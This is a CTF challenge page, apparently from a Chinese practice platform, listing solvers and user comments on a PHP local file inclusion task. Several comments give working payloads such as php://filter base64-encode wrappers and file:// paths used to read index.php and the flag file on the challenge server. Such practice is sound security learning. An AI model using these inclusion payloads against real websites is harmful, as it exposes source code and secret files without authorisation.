评分(11)
解题动态
18171382569 攻破了该题 15小时前
krnxy777 攻破了该题 2天前
Wu. 攻破了该题 3天前
qq1002517 攻破了该题 4天前
麻辣鸽子头 攻破了该题 4天前
Arno_Zoffy 攻破了该题 5天前
Jasmine_Iris 攻破了该题 5天前
AioKT 攻破了该题 5天前
潭影空人心 攻破了该题 6天前
hdcc1 攻破了该题 7天前
linxingjun 攻破了该题 10天前
jaysongong 攻破了该题 10天前
violet1 攻破了该题 11天前
potato66 攻破了该题 11天前
一只小白鲸 攻破了该题 12天前
xiaoxuexue 攻破了该题 13天前
bak3l1 攻破了该题 13天前
妙龄 攻破了该题 13天前
19113115774 攻破了该题 13天前
评论
LHJ2022 3年前
举报
http://114.67.175.224:xxxxx/index.php?file=/flag 这不直接出flag
是啊志啊 3年前
举报
在url后改为 ?file=php://filter/read=convert.base64-encode/resource=index.php发现显示了base64编码的字符串 复制解码就行了
发到付件埃里克FDA 3年前
举报
这题考的就是 本地文件包含漏洞获得 php代码的内容
wuzhengke 3年前
举报
先点击场景中超链接,进入新界面。新界面url(网址)改为http://114.67.175.224:10430/index.php?file=php://filter/read=convert.base64-encode/resource=index.php,进入新界面,上面的密文base64解密,解密的内容中含有flag
lysandria 3年前
举报
php://,data://,filter等伪协议被重置,直接?file=./flag.php知道路径,然后用?file=file:///./flag.php
tswler 3年前
举报
不是直接file=/flag就出来了?
joyce707 3年前
举报
@发到付件埃里克FDA 可以的
单片眼镜 3年前
举报
可以的,就是那个flag
zp 3年前
举报
你这样不行
发到付件埃里克FDA 3年前
举报
你这个flag得到的是错误的 源代码里面的注释的flg才是对的
Va1en 3年前
举报
读文件 编码后输出
yinyi980128 3年前
举报
为什么session对话不行呀,一直注入不进去
lyy000 3年前
举报
好家伙../显示出来给我精神一抖擞
bear 3年前
举报
哈哈,终于做出来一道题了。 index.php?file=php://filter/read=convert.base64-encode/resource=index.php 这里得到的是index.php文件内容的源代码的base64,然后使用base64解码就得到源代码,flag在里面